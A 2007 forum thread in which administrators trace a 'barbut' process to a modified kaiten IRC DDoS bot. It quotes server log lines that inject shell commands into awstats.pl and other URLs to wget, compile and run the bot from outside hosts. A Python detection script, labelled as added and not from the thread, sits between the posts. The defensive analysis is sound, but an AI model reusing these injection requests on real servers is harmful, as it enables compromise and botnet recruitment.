
Re: barbut process using 100% cpu and connecting


A

Nov 19, 2007, 4:03:01 AM
A long gap since this post, but I've just noticed "barbut" in our web
server logs, googled, and found nothing but this query:

On Jul 16, 6:15pm Jens Hoffman wrote:

> krzysiek schrieb:

> > there was a process called "barbut" (2 of them) using 49,2% CPU time
> > each :O
> > meanwhile netstat showed established connections to 195.73.177.146:666
> > + several waiting.
> Some host in .nl.
> > I have no idea where this process came from. Any clues?
> I don't know about you, but I would take the machine off the net and
> try to understand what happened.


I hope the original poster did that - here's the "barbut" occurrence in
our apache log:

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;
echo| HTTP/1.1

(there are four attempts, trying different paths to awstats.pl)

I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

Googling for some of those names finds this is probably the source code:

http://packetstormsecurity.nl/irc/kaiten.c

The comments start:

"This is a IRC based distributed denial of service client. It connects
to the server specified below and accepts commands via the channel
specified."

Hope this was useful,
A.

ale2007

Nov 20, 2007, 2:46:59 AM
On 19 Nov, 10:03, "A" <a...@nospam.com> wrote:
> Googling for some of those names finds this is probably the source code:
>
> http://packetstormsecurity.nl/irc/kaiten.c

I've found similar requests in yesterday's log (19/Nov/2007:20:02:53
+0100)
"GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
barbut ; HTTP/1.1"

W.r.t. the sources mentioned above, barbut.c has been changed,
including the following differences:

* The CHAN (channel to join) changed from "#whatever" to "#whatever1"
* The server list has been replaced by the single entry
"217.79.176.126"
* The initial connection has changed from port 6667 to port 113
* The "run command" macro has changed from "SH <cmd>" to "ZK <cmd>"
* The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
%s +iwx"

That didn't apparently succeed, so I don't know who are the victims...
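A small detection script for the two request shapes quoted in this thread (the awstats.pl `configdir=|` pipe in A's log and the `cmd=` form above), added here as an example and not anything posted by the thread's participants; the sample request lines are constructed from the quoted ones, and the regexes for what to flag are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines modelled on the two quoted in this thread,
# plus two benign ones; these are not real log files.
SAMPLE_REQUESTS = [
    "GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;"
    "chmod%20755%20barbut;./barbut;echo| HTTP/1.1",
    "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;"
    "wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./barbut ; HTTP/1.1",
    "GET /awstats/awstats.pl?config=example.org HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

# Split "METHOD target HTTP/x.y"; the target may contain unencoded spaces.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>.*?)\s+HTTP/\d\.\d\s*$")
# Shell metacharacters have no business in an awstats query string; the
# leading '|' in configdir is the pipe-open trick this thread's log shows.
SHELL_METACHARS = re.compile(r"[|;`]")
# Typical staging verbs seen in both quoted requests (assumed watch-list).
STAGING_CMDS = re.compile(r"\b(wget|curl|chmod|gcc|killall)\b")
# Host/path handed to wget or curl: the indicator to block and hunt for.
FETCH_URL = re.compile(r"\b(?:wget|curl)\s+(?:https?://)?([^\s;|]+)")

def analyse_request(request_line):
    """Return None for benign lines, else a dict with the requested path,
    the staging commands seen, and the URL the payload was fetched from."""
    m = REQUEST_LINE.match(request_line)
    if not m or "?" not in m.group("target"):
        return None
    path, _, query = m.group("target").partition("?")
    decoded = unquote(query)  # turns %20 back into spaces etc.
    if not SHELL_METACHARS.search(decoded) and not STAGING_CMDS.search(decoded):
        return None
    fetch = FETCH_URL.search(decoded)
    return {
        "path": path,
        "commands": sorted(set(STAGING_CMDS.findall(decoded))),
        "fetch_url": fetch.group(1) if fetch else None,
    }

def scan(requests):
    """Pair each suspicious request with its analysis; benign lines are dropped."""
    results = []
    for r in requests:
        hit = analyse_request(r)
        if hit:
            results.append((r, hit))
    return results

if __name__ == "__main__":
    for line, hit in scan(SAMPLE_REQUESTS):
        print(hit["fetch_url"], hit["commands"], line[:60])
```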

Peder.R...@gmail.com

Nov 21, 2007, 3:02:09 PM
On Nov 20, 1:46 am, ale2007 <ves...@tana.it> wrote:
> On 19 Nov, 10:03, "A" <a...@nospam.com> wrote:
>
> > Googling for some of those names finds this is probably the source code:
>
> > http://packetstormsecurity.nl/irc/kaiten.c
>
> I've found similar requests in yesterday's log (19/Nov/2007:20:02:53
> +0100)
> "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
> barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
> barbut ; HTTP/1.1"
>
> W.r.t. the sources mentioned above, barbut.c has been changed,
> including the following differences:
>
> * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
> * The server list has been replaced by the single entry
> "217.79.176.126"
> * The initial connection has changed from port 6667 to port 113
> * The "run command" macro has changed from "SH <cmd>" to "ZK <cmd>"
> * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
> %s +iwx"
>
> That didn't apparently succeed, so I don't know who are the victims...

I found the same connection to my Imail server and Sophos posted this
a few minutes ago.

http://www.sophos.com/security/analyses/trojkaitenw.html
